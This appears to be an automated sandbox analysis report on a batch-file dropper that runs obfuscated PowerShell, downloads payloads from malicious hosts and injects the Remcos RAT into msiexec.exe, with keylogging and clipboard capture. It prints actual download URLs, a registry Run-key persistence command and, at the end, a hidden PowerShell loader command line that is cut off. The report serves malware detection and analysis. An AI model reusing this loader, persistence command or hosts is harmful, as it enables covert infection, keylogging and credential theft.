                Source: powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhvC236.tmp.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhvC236.tmp.14.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCB101A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhvC236.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhvC236.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhvC236.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCB101A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2196657506.000001DCAFD1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com
                Source: powershell.exe, 00000002.00000002.2241503546.000001DCC7CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com/
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCAFD1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com/Hovedvrket.rarP
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com/Hovedvrket.rarXR
                Source: powershell.exe, 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvC236.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                Source: bhvC236.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/l
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006AD7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4524470117.0000000022230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/nwnNBPSeuTV8.bin
                Source: msiexec.exe, 00000008.00000002.4524470117.0000000022230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/nwnNBPSeuTV8.binafsksGodmiottoezanella.com/nwnNBPSeuTV8.bin
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvC236.tmp.14.drString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownHTTPS traffic detected: 194.76.118.27:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.5:49797 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041183A OpenClipboard,GetLastError,14_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_004072B5

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_6388.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00401806 NtdllDefWindowProc_W,14_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004018C0 NtdllDefWindowProc_W,14_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F3B2C02_2_00007FF848F3B2C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F3C0222_2_00007FF848F3C022
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04B3F3285_2_04B3F328
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04B3FBF85_2_04B3FBF8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04B3EFE05_2_04B3EFE0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228F71948_2_228F7194
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228EB5C18_2_228EB5C1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B04014_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043610D14_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044731014_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044A49014_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040755A14_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0043C56014_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B61014_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044D6C014_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004476F014_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B87014_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044081D14_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0041495714_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004079EE14_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407AEB14_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044AA8014_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00412AA914_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404B7414_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404B0314_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044BBD814_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404BE514_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00404C7614_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00415CFE14_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00416D7214_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00446D3014_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00446D8B14_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00406E8F14_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040503815_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041208C15_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004050A915_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040511A15_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043C13A15_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004051AB15_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044930015_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040D32215_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A4F015_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043A5AB15_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041363115_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044669015_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A73015_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004398D815_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004498E015_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A88615_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043DA0915_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00438D5E15_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00449ED015_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041FE8315_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00430F5415_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004050C218_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004014AB18_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040513318_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004051A418_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040124618_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040CA4618_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040523518_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004032C818_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040168918_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00402F6018_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6147
                Source: unknownProcess created: Commandline size = 6171
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6147Jump to behavior
                Source: amsi32_6388.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@24/13@7/4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,14_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,14_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,14_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,14_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\aspargessuppens.BriJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctl2d2ua.rov.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5576
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6388
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 00000008.00000002.4528323110.0000000023130000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000E.00000002.2578323561.0000000004756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_15-33237
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard 